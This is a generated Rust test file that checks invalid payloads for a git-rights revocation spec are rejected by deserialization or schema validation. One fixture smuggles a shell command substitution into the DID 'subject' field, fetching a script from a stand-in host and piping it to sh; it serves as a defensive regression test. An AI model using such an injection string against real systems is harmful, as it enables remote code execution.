//! Generated by `trust-tasks-codegen` — do not edit by hand.
//!
//! Round-trip tests harvested from the spec's `spec.md`, plus a
//! `rejects_invalid_examples` test for any fixtures in
//! `payload.invalid-examples.json` (validate feature), for
//! `git-ns/right/revoke/0.2`
#[allow(unused_imports)]
use trust_tasks_rs::specs::git_ns::right::revoke::v0_2 as spec;
/// Each fixture in `payload.invalid-examples.json` MUST be
/// rejected by at least one of: serde deserialization, or
/// JSON-Schema validation under the `validate` feature. The
/// fixture file documents the producer-side bug class that
/// each payload exemplifies; this generated test pins it.
#[cfg(feature = "validate")]
#[test]
fn rejects_invalid_examples() {
    use trust_tasks_rs::validate::ValidatedPayload;
    let fixtures: &[(&str, &str)] = &[
        (
            "All three of `subject`, `right` and `resource` identify the record.",
            "{\n  \"resource\": \"github.com/acme/gadgets\",\n  \"subject\": \"did:webvh:QmDanScid4:dan.example\"\n}",
        ),
        (
            "A resource always names its forge.",
            "{\n  \"resource\": \"acme/gadgets\",\n  \"right\": \"git.commit.sign\",\n  \"subject\": \"did:webvh:QmDanScid4:dan.example\"\n}",
        ),
        (
            "There is no wildcard right: revocation names the record exactly.",
            "{\n  \"resource\": \"github.com/acme/gadgets\",\n  \"right\": \"*\",\n  \"subject\": \"did:webvh:QmDanScid4:dan.example\"\n}",
        ),
        (
            "Unknown members are refused (additionalProperties: false).",
            "{\n  \"cascade\": true,\n  \"resource\": \"github.com/acme/gadgets\",\n  \"right\": \"git.commit.sign\",\n  \"subject\": \"did:webvh:QmDanScid4:dan.example\"\n}",
        ),
        (
            "`subject` is a DID in the W3C DID Core syntax, whose method-specific id admits only `A-Z a-z 0-9 . - _ :` and percent-encoded octets. `did:[a-z0-9]+:\\S+` let a command substitution through, and a surface that later quoted the value into a shell command ran it.",
            "{\n  \"resource\": \"github.com/acme/gadgets\",\n  \"right\": \"git.commit.sign\",\n  \"subject\": \"did:web:x.example$(curl${IFS}-s${IFS}evil.example|sh)\"\n}",
        ),
        (
            "`subject` is a DID, and a DID has no whitespace in it.",
            "{\n  \"resource\": \"github.com/acme/gadgets\",\n  \"right\": \"git.commit.sign\",\n  \"subject\": \"did:web:acme-vtc.example:bob evil\"\n}",
        ),
        (
            "`subject` is a bare DID naming a party, not a DID URL: a `#` fragment (a verification-method id) is refused, as are a path and a query.",
            "{\n  \"resource\": \"github.com/acme/gadgets\",\n  \"right\": \"git.commit.sign\",\n  \"subject\": \"did:key:z6MkhaXgBZDvotDkL5257faiztiGiC2QtKLGpbnnEGta2doK#z6MkhaXgBZDvotDkL5257faiztiGiC2QtKLGpbnnEGta2doK\"\n}",
        ),
        (
            "`subject` is a DID, whose method name is lowercase letters and digits only; `did:WebVH:` is not `did:webvh:`, and DIDs are compared by exact string.",
            "{\n  \"resource\": \"github.com/acme/gadgets\",\n  \"right\": \"git.commit.sign\",\n  \"subject\": \"did:WebVH:QmBobScid2:acme-vtc.example:bob\"\n}",
        ),
    ];
    for (i, (note, raw)) in fixtures.iter().enumerate() {
        let value: serde_json::Value = match serde_json::from_str(raw) {
            Ok(v) => v,
            Err(_) => continue,
        };
        let serde_ok = serde_json::from_value::<spec::Payload>(value.clone()).is_ok();
        let schema_ok = spec::Payload::validate_value(&value).is_ok();
        assert!(
            !(serde_ok && schema_ok),
            "invalid-example #{} ({:?}) was accepted by both serde and JSON Schema; \
                         the fixture's stated failure class is no longer caught:\n{}",
            i + 1,
            note,
            raw
        );
    }
}
